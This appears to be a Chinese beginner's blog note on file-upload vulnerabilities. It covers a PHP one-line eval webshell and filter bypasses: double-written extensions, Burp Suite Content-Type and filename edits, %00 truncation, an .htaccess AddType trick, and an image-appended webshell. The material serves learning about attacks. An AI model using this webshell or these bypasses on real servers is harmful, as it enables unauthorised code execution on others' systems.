文件上传漏洞

文件上传漏洞

我们可以通过网页上传功能实现向目标服务器上传一些恶意代码,例如一句话木马<?php @eval($_POST['press word']); ?>在没有保护的情况下直接把一句话木马上传, 再用菜刀进行连接

双写绕过

在一些网站会设置检测,把php过滤掉,例如上传文件名为1.php过滤后文件名为1.这样菜刀就无法连接了,此时我们只需把文件名改为1.pphphp,在过滤掉php后文件名为1.php菜刀便可以链接‘

用burpsuit

在一些网站会限制上传类型,比如只容许上传png,jpeg…,或者禁止上传php…文件。这时我们可以通过burpsuit,拦截抓包对请求包进行修改,修改cotent-type把application/octet-stream,改为image/png,系统会认为你上传的是png文件实现绕过,或者在上传前把1.php改为1.png,上传后抓包把请求包的filename="2.png"改为filename=“2.php”,即修改系统保存的文件名也可以实现绕过

%00截断

利用apeac与系统的后缀名识别差异将后缀名改为1.php%00png,在上传路径中的1.php改为1.php%00png实现过

.htaccess

.htaccess是apache的配置文件上传该文件可修改apache配置,可以将png文件当成php文件执行,例如 AddType application/x-httpd-php .png,然后把该.htaccess与1.png都上传这样1.png就会当成1.php执行

文件头检测

一些系统中会有设置文件头检测这样上诉方法不能使用,系统会检测文件编码来判断上传的文件类型
我们需要制作一个图片木马,比如系统要求上传png文件我们可以找一个png图片,把他的后面加上恶意代码<?php @eval($_POST['press word']); ?>用上面方法改为php上传即可

我的菜刀蚁剑都用不了所以没图片

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值